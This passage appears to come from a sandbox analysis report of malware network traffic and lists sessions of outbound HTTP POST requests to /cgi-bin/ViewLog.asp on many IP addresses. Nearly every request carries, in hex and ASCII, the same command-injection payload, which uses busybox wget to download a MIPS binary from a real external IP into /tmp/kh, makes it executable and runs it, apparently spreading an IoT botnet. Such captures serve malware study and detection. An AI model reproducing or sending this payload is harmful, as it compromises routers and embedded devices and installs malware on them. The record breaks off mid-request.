                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              593192.168.2.146011495.215.52.1508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.543034077 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.665721893 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              594192.168.2.143559031.200.101.1408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.564222097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              595192.168.2.145312231.200.5.1068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.801857948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.833561897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.977328062 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.009059906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              596192.168.2.144667631.44.131.2168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.808491945 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              597192.168.2.143543894.122.60.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.988863945 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              598192.168.2.145423694.190.165.2208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.988990068 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.209032059 CET278INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              599192.168.2.144236662.29.113.48080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.992639065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              600192.168.2.145191494.122.24.98080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.995407104 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              601192.168.2.143681494.187.116.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:57.011853933 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.145714045 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              602192.168.2.145453894.121.106.2428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:57.032222986 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.273720980 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.745645046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.881496906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.769262075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.544836044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              603192.168.2.144600095.85.181.2448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:57.278187990 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              604192.168.2.144304031.200.112.1408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:57.279546022 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              605192.168.2.145353294.121.132.478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:57.285016060 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              606192.168.2.145444095.86.106.1578080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:57.285139084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              607192.168.2.143287895.86.105.1198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:57.285224915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
